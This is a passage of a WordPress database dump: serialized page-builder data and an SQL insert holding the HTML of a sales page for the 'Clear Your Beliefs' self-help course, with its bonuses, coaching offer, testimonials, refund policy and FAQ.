/>\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1578, 2025, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much 